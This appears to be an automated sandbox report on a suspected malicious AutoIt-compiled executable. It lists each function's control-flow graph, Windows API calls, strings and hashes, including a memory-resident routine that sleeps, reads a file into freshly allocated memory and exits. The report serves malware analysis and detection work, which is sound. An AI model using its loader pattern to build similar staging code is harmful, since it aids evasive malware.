                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe$CMDLINE$CMDLINERAW
                            • API String ID: 861526374-3044170080
                            • Opcode ID: d469afee65a75165e304875047090a0becf73ea50ecdd810000cdde733f91bb5
                            • Instruction ID: 59260b0247a9afd1808c68ed674a9b88c15a75f3fcf71d43c871355b0acfc02e
                            • Opcode Fuzzy Hash: d469afee65a75165e304875047090a0becf73ea50ecdd810000cdde733f91bb5
                            • Instruction Fuzzy Hash: FE816E7690011AAADB15FBE0DD52EEF7BB8BF15750F200025F582B7092EB706B44CBA1
                            Function 000CC890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 944 cc890-cc940 call b0650 call a010a call 84bce call cc6a0 call 841a7 call a2203 957 cc946-cc94d call cce59 944->957 958 cc9f3-cc9fa call cce59 944->958 963 cc9fc-cc9fe 957->963 964 cc953-cc9f1 call a297d call a1943 call a1914 call a297d call a1914 * 2 957->964 958->963 965 cca03 958->965 966 ccc53-ccc54 963->966 968 cca06-ccac2 call 8417d * 8 call cd009 call a4129 964->968 965->968 971 ccc71-ccc7f call 84fd2 966->971 1003 ccacb-ccae6 call cc6e4 968->1003 1004 ccac4-ccac6 968->1004 1007 ccaec-ccaf4 1003->1007 1008 ccb78-ccb84 call a4274 1003->1008 1004->966 1009 ccafc 1007->1009 1010 ccaf6-ccafa 1007->1010 1015 ccb9a-ccb9e 1008->1015 1016 ccb86-ccb95 DeleteFileW 1008->1016 1012 ccb01-ccb1f call 8417d 1009->1012 1010->1012 1020 ccb49-ccb5f call cc07d call a373e 1012->1020 1021 ccb21-ccb27 1012->1021 1018 ccc2e-ccc42 CopyFileW 1015->1018 1019 ccba4-ccc1b call cd10c call cd134 call cc251 1015->1019 1016->966 1023 ccc44-ccc51 DeleteFileW 1018->1023 1024 ccc56-ccc6c DeleteFileW call ccfc8 1018->1024 1019->1024 1040 ccc1d-ccc2c DeleteFileW 1019->1040 1037 ccb64-ccb6f 1020->1037 1025 ccb29-ccb3c call cc81a 1021->1025 1023->966 1024->971 1035 ccb3e-ccb47 1025->1035 1035->1020 1037->1007 1039 ccb75 1037->1039 1039->1008 1040->966
                            APIs
                              • Part of subcall function 000CC6A0: __time64.LIBCMT ref: 000CC6AA
                              • Part of subcall function 000841A7: _fseek.LIBCMT ref: 000841BF
                            • __wsplitpath.LIBCMT ref: 000CC96F
                              • Part of subcall function 000A297D: __wsplitpath_helper.LIBCMT ref: 000A29BD
                            • _wcscpy.LIBCMT ref: 000CC982
                            • _wcscat.LIBCMT ref: 000CC995
                            • __wsplitpath.LIBCMT ref: 000CC9BA
                            • _wcscat.LIBCMT ref: 000CC9D0
                            • _wcscat.LIBCMT ref: 000CC9E3
                              • Part of subcall function 000CC6E4: _memmove.LIBCMT ref: 000CC71D
                              • Part of subcall function 000CC6E4: _memmove.LIBCMT ref: 000CC72C
                            • _wcscmp.LIBCMT ref: 000CC92A
                              • Part of subcall function 000CCE59: _wcscmp.LIBCMT ref: 000CCF49
                              • Part of subcall function 000CCE59: _wcscmp.LIBCMT ref: 000CCF5C
                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 000CCB8D
                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000CCC24
                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000CCC3A
                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000CCC4B
                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000CCC5D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                            • String ID:
                            • API String ID: 152968663-0
                            • Opcode ID: c951f673f7cba6a76e32346a8329a6dce3d2fb1e90dd963553544932f58e95e8
                            • Instruction ID: b9827bea43cdcfbd361adf98b99f019fe37548ebb243a84914e2b562e5079f20
                            • Opcode Fuzzy Hash: c951f673f7cba6a76e32346a8329a6dce3d2fb1e90dd963553544932f58e95e8
                            • Instruction Fuzzy Hash: A7C11AB1D00129AADF10DFA5CC85FDEBBB9AF59314F0040AAF609E6152DB709A84CF65
                            Function 0009E975 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 170COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1041 9e975-9ead5 call a010a GetModuleFileNameW call a297d call a2bbc call a2bff call a010a call a1943 call 8d3d2 call 9eb05 1057 9eada-9eade 1041->1057 1058 9eae0-9eaf4 call 85cd3 1057->1058 1059 9eaf7-9eb00 1057->1059 1061 f32ba-f32e0 call 8a4f6 * 2 1059->1061 1067 f3308-f3315 call a18fb 1061->1067 1068 f32e2-f32f0 call 8a4f6 1061->1068 1074 f333b-f338c call a010a call a2c1d call 8a4f6 1067->1074 1075 f3317-f3328 call a18fb 1067->1075 1068->1067 1073 f32f2-f3303 call a1914 1068->1073 1083 f3392-f3393 1073->1083 1074->1058 1074->1083 1075->1074 1084 f332a-f333a call a1914 1075->1084 1083->1061 1084->1074
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0009EA39
                            • __wsplitpath.LIBCMT ref: 0009EA56
                              • Part of subcall function 000A297D: __wsplitpath_helper.LIBCMT ref: 000A29BD
                            • _wcsncat.LIBCMT ref: 0009EA69
                            • __makepath.LIBCMT ref: 0009EA85
                              • Part of subcall function 000A2BFF: __wmakepath_s.LIBCMT ref: 000A2C13
                              • Part of subcall function 000A010A: std::exception::exception.LIBCMT ref: 000A013E
                              • Part of subcall function 000A010A: __CxxThrowException@8.LIBCMT ref: 000A0153
                            • _wcscpy.LIBCMT ref: 0009EABE
                              • Part of subcall function 0009EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0009EADA,?,?), ref: 0009EB27
                            • _wcscat.LIBCMT ref: 000F32FC
                            • _wcscat.LIBCMT ref: 000F3334
                            • _wcsncpy.LIBCMT ref: 000F3370
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                            • String ID: Include$\
                            • API String ID: 1213536620-3429789819
                            • Opcode ID: 775e714229d5e2182a56a60c8684644beba80e8b86a9d98342ef7d4cc84c8ba9
                            • Instruction ID: 8d815d8a0e0e2a1adc3e575c2a3e6d4903b2a1a701e373d8f17908daf06bcad0
                            • Opcode Fuzzy Hash: 775e714229d5e2182a56a60c8684644beba80e8b86a9d98342ef7d4cc84c8ba9
                            • Instruction Fuzzy Hash: 75514BB94043449BC714EF98EC85CAAB7F8FB4E310B80492EF54593672EB7496C4CB66
                            Function 000829C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1090 829c2-829e2 1092 82a42-82a44 1090->1092 1093 829e4-829e7 1090->1093 1092->1093 1096 82a46 1092->1096 1094 82a48 1093->1094 1095 829e9-829f0 1093->1095 1100 82a4e-82a51 1094->1100 1101 f2307-f2335 call 8322e call 9ec33 1094->1101 1097 82aac-82ab4 PostQuitMessage 1095->1097 1098 829f6-829fb 1095->1098 1099 82a2b-82a33 DefWindowProcW 1096->1099 1105 82a72-82a74 1097->1105 1103 f238f-f23a3 call c57fb 1098->1103 1104 82a01-82a03 1098->1104 1106 82a39-82a3f 1099->1106 1107 82a53-82a54 1100->1107 1108 82a76-82a9d SetTimer RegisterWindowMessageW 1100->1108 1135 f233a-f2341 1101->1135 1103->1105 1128 f23a9 1103->1128 1110 82a09-82a0e 1104->1110 1111 82ab6-82ac5 call 81e58 1104->1111 1105->1106 1114 82a5a-82a6d KillTimer call 82b94 call 82ac7 1107->1114 1115 f22aa-f22ad 1107->1115 1108->1105 1112 82a9f-82aaa CreatePopupMenu 1108->1112 1117 f2374-f237b 1110->1117 1118 82a14-82a19 1110->1118 1111->1105 1112->1105 1114->1105 1121 f22af-f22b1 1115->1121 1122 f22e3-f2302 MoveWindow 1115->1122 1117->1099 1124 f2381-f238a call bb31f 1117->1124 1126 f235f-f236f call c5fdb 1118->1126 1127 82a1f-82a25 1118->1127 1130 f22b3-f22b6 1121->1130 1131 f22d2-f22de SetFocus 1121->1131 1122->1105 1124->1099 1126->1105 1127->1099 1127->1135 1128->1099 1130->1127 1136 f22bc-f22cd call 8322e 1130->1136 1131->1105 1135->1099 1139 f2347-f235a call 82b94 call 83598 1135->1139 1136->1105 1139->1099
                            APIs
                            • DefWindowProcW.USER32(?,?,?,?), ref: 00082A33
                            • KillTimer.USER32(?,00000001), ref: 00082A5D
                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00082A80
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00082A8B
                            • CreatePopupMenu.USER32 ref: 00082A9F
                            • PostQuitMessage.USER32(00000000), ref: 00082AAE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                            • String ID: TaskbarCreated
                            • API String ID: 129472671-2362178303
                            • Opcode ID: bdc59f7ad13e5422ec91b698fbaa8dd353938788792fd661b8605fbecc3e7e6e
                            • Instruction ID: 35239f0927110e443f4dacef8387a8a5ad0e7b7da38569861652685b541b9568
                            • Opcode Fuzzy Hash: bdc59f7ad13e5422ec91b698fbaa8dd353938788792fd661b8605fbecc3e7e6e
                            • Instruction Fuzzy Hash: FE41E571114246ABDB38BF64EC09BBD36D5FF15300F040126F6C2979A2DBA59DC09766
                            Function 000830A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32(0000000F), ref: 000830B0
                            • LoadCursorW.USER32(00000000,00007F00), ref: 000830BF
                            • LoadIconW.USER32(00000063), ref: 000830D5
                            • LoadIconW.USER32(000000A4), ref: 000830E7
                            • LoadIconW.USER32(000000A2), ref: 000830F9
                              • Part of subcall function 0008318A: LoadImageW.USER32(00080000,00000063,00000001,00000010,00000010,00000000), ref: 000831AE
                            • RegisterClassExW.USER32(?), ref: 00083167
                              • Part of subcall function 00082F58: GetSysColorBrush.USER32(0000000F), ref: 00082F8B
                              • Part of subcall function 00082F58: RegisterClassExW.USER32(00000030), ref: 00082FB5
                              • Part of subcall function 00082F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00082FC6
                              • Part of subcall function 00082F58: InitCommonControlsEx.COMCTL32(?), ref: 00082FE3
                              • Part of subcall function 00082F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00082FF3
                              • Part of subcall function 00082F58: LoadIconW.USER32(000000A9), ref: 00083009
                              • Part of subcall function 00082F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00083018
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                            • String ID: #$0$AutoIt v3
                            • API String ID: 423443420-4155596026
                            • Opcode ID: f8375929140068b49112390ea4e9a1f1a0bc63744a489c894fe444d1c46f7b66
                            • Instruction ID: 6998a196106243df508f3f76191fdfff8aa637e949adb94bffbeef949bdb2915
                            • Opcode Fuzzy Hash: f8375929140068b49112390ea4e9a1f1a0bc63744a489c894fe444d1c46f7b66
                            • Instruction Fuzzy Hash: D5213CB8D00314ABCB10DFA9EC49A99BFF5FB49714F00412AF614A36B0D7B545C08F95
                            Function 00A51FB8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1154 a51fb8-a52066 call a4f9a8 1157 a5206d-a52093 call a52ec8 CreateFileW 1154->1157 1160 a52095 1157->1160 1161 a5209a-a520aa 1157->1161 1162 a521e5-a521e9 1160->1162 1168 a520b1-a520cb VirtualAlloc 1161->1168 1169 a520ac 1161->1169 1163 a5222b-a5222e 1162->1163 1164 a521eb-a521ef 1162->1164 1170 a52231-a52238 1163->1170 1166 a521f1-a521f4 1164->1166 1167 a521fb-a521ff 1164->1167 1166->1167 1171 a52201-a5220b 1167->1171 1172 a5220f-a52213 1167->1172 1173 a520d2-a520e9 ReadFile 1168->1173 1174 a520cd 1168->1174 1169->1162 1175 a5228d-a522a2 1170->1175 1176 a5223a-a52245 1170->1176 1171->1172 1179 a52215-a5221f 1172->1179 1180 a52223 1172->1180 1181 a520f0-a52130 VirtualAlloc 1173->1181 1182 a520eb 1173->1182 1174->1162 1177 a522a4-a522af VirtualFree 1175->1177 1178 a522b2-a522ba 1175->1178 1183 a52247 1176->1183 1184 a52249-a52255 1176->1184 1177->1178 1179->1180 1180->1163 1187 a52137-a52152 call a53118 1181->1187 1188 a52132 1181->1188 1182->1162 1183->1175 1185 a52257-a52267 1184->1185 1186 a52269-a52275 1184->1186 1190 a5228b 1185->1190 1191 a52277-a52280 1186->1191 1192 a52282-a52288 1186->1192 1194 a5215d-a52167 1187->1194 1188->1162 1190->1170 1191->1190 1192->1190 1195 a52169-a52198 call a53118 1194->1195 1196 a5219a-a521ae call a52f28 1194->1196 1195->1194 1202 a521b0 1196->1202 1203 a521b2-a521b6 1196->1203 1202->1162 1204 a521c2-a521c6 1203->1204 1205 a521b8-a521bc CloseHandle 1203->1205 1206 a521d6-a521df 1204->1206 1207 a521c8-a521d3 VirtualFree 1204->1207 1205->1204 1206->1157 1206->1162 1207->1206
                            APIs
                            • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00A52089
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A522AF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CreateFileFreeVirtual
                            • String ID:
                            • API String ID: 204039940-0
                            • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                            • Instruction ID: 5e6f52bbc6e93ff30bd167fa766dbfce85623ff64b072868d82df50b84da7543
                            • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                            • Instruction Fuzzy Hash: 94A11974E00209EBDB14CFA4C994BEEBBB5FF49305F208159EA11BB280D7759A85CF50
                            Function 0009EB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1263 9eb05-9eb2f call 8c4cd RegOpenKeyExW 1266 f4b17-f4b2e RegQueryValueExW 1263->1266 1267 9eb35-9eb39 1263->1267 1268 f4b91-f4b9a RegCloseKey 1266->1268 1269 f4b30-f4b6d call a010a call 84bce RegQueryValueExW 1266->1269 1274 f4b6f-f4b86 call 87e53 1269->1274 1275 f4b88-f4b90 call 84fd2 1269->1275 1274->1275 1275->1268
                            APIs
                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0009EADA,?,?), ref: 0009EB27
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0009EADA,?,?), ref: 000F4B26
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0009EADA,?,?), ref: 000F4B65
                            • RegCloseKey.ADVAPI32(?,?,0009EADA,?,?), ref: 000F4B94
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: QueryValue$CloseOpen
                            • String ID: Include$Software\AutoIt v3\AutoIt
                            • API String ID: 1586453840-614718249
                            • Opcode ID: 8a96cda69b2aeb9544fa01482f06a009250f02d8a018108b00673bf4533aed10
                            • Instruction ID: 043189ad4ddc6c8dda9e6581fca3ca092781022726c286cfb2bb8cac3b5da5e9
                            • Opcode Fuzzy Hash: 8a96cda69b2aeb9544fa01482f06a009250f02d8a018108b00673bf4533aed10
                            • Instruction Fuzzy Hash: FC113D71601108BEEB04ABA4DD86EFF77BCEB04354F104469B546E6092EBB09E41D750
                            Function 00082E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1290 82e9d-82f0d CreateWindowExW * 2 ShowWindow * 2
                            APIs
                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00082ECB
                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00082EEC
                            • ShowWindow.USER32(00000000), ref: 00082F00
                            • ShowWindow.USER32(00000000), ref: 00082F09
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$CreateShow
                            • String ID: AutoIt v3$edit
                            • API String ID: 1584632944-3779509399
                            • Opcode ID: 129af3c5f08fd26b3d1d92ad2318330d97e63d51845f049f8f1efbd39cb6a52e
                            • Instruction ID: 20aff97399895e2ef54d2bf8b188c78e7b41f266c2f6bab7e621df8663b806aa
                            • Opcode Fuzzy Hash: 129af3c5f08fd26b3d1d92ad2318330d97e63d51845f049f8f1efbd39cb6a52e
                            • Instruction Fuzzy Hash: FCF0D0755802D47AD7315B57BC48E673E7DE7C7F20B01411EB904A3570C66508D5DA71
                            Function 00A51D58 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1291 a51d58-a51eb7 call a4f9a8 call a51c48 CreateFileW 1298 a51ebe-a51ece 1291->1298 1299 a51eb9 1291->1299 1302 a51ed5-a51eef VirtualAlloc 1298->1302 1303 a51ed0 1298->1303 1300 a51f6e-a51f73 1299->1300 1304 a51ef1 1302->1304 1305 a51ef3-a51f0a ReadFile 1302->1305 1303->1300 1304->1300 1306 a51f0c 1305->1306 1307 a51f0e-a51f48 call a51c88 call a50c48 1305->1307 1306->1300 1312 a51f64-a51f6c ExitProcess 1307->1312 1313 a51f4a-a51f5f call a51cd8 1307->1313 1312->1300 1313->1312
                            APIs
                              • Part of subcall function 00A51C48: Sleep.KERNEL32(000001F4), ref: 00A51C59
                            • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A51EAD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CreateFileSleep
                            • String ID: 3BOG1KTWR2M8XFV873TPSRS591YWM
                            • API String ID: 2694422964-1159107725
                            • Opcode ID: 0c2a6d109cf65bea2b48aef015542c42dd75a29ff6ddcca05e914828b31ef5a2
                            • Instruction ID: 0c23eebe3eab6d2fdb7619b45e59757482a7b048f22f828b1580b9e896b7b3cd
                            • Opcode Fuzzy Hash: 0c2a6d109cf65bea2b48aef015542c42dd75a29ff6ddcca05e914828b31ef5a2
                            • Instruction Fuzzy Hash: DA616130D08288DAEF11DBF4C845BEEBB75AF19305F044199E5587B2C1D7BA0B49CB65
                            Function 000838E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                            Download Yara Rule
                            APIs
                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000F454E
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                            • _memset.LIBCMT ref: 00083965
                            • _wcscpy.LIBCMT ref: 000839B5
                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 000839C6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                            • String ID: Line:
                            • API String ID: 3942752672-1585850449
                            • Opcode ID: 14dcca09d312e6b0401eaebd00aec72f55b0f85e99eefcfc066cb621a79d939e
                            • Instruction ID: 9a8b56786983c6e1fc02782b819cb6030b8696c7e979a54f59ecca464aef18da
                            • Opcode Fuzzy Hash: 14dcca09d312e6b0401eaebd00aec72f55b0f85e99eefcfc066cb621a79d939e
                            • Instruction Fuzzy Hash: 3F319071008340ABD721FB60DC45BDF77E8BB95710F00451AF5C9925B2EBB0AA88CB92
                            Function 00083DCB Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00083F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,000834E2,?,00000001), ref: 00083FCD
                            • _free.LIBCMT ref: 000F3C27
                            • _free.LIBCMT ref: 000F3C6E
                              • Part of subcall function 0008BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,001422E8,?,00000000,?,00083E2E,?,00000000,?,0011DBF0,00000000,?), ref: 0008BE8B
                              • Part of subcall function 0008BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00083E2E,?,00000000,?,0011DBF0,00000000,?,00000002), ref: 0008BEA7
                              • Part of subcall function 0008BDF0: __wsplitpath.LIBCMT ref: 0008BF19
                              • Part of subcall function 0008BDF0: _wcscpy.LIBCMT ref: 0008BF31
                              • Part of subcall function 0008BDF0: _wcscat.LIBCMT ref: 0008BF46
                              • Part of subcall function 0008BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0008BF56
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                            • API String ID: 1510338132-1757145024
                            • Opcode ID: 02d01eeb7fe253d7405f7a97b9e49407220bdb0c153012029f86055d5a063877
                            • Instruction ID: 4d1eef8eed954e803c7156a23e087a530940d4e44a019b03b04f6f5b4d464291
                            • Opcode Fuzzy Hash: 02d01eeb7fe253d7405f7a97b9e49407220bdb0c153012029f86055d5a063877
                            • Instruction Fuzzy Hash: C8915071A1021DAFCF04EFA4CC919FEB7B4BF05320F144429F956AB292EB749A45DB60
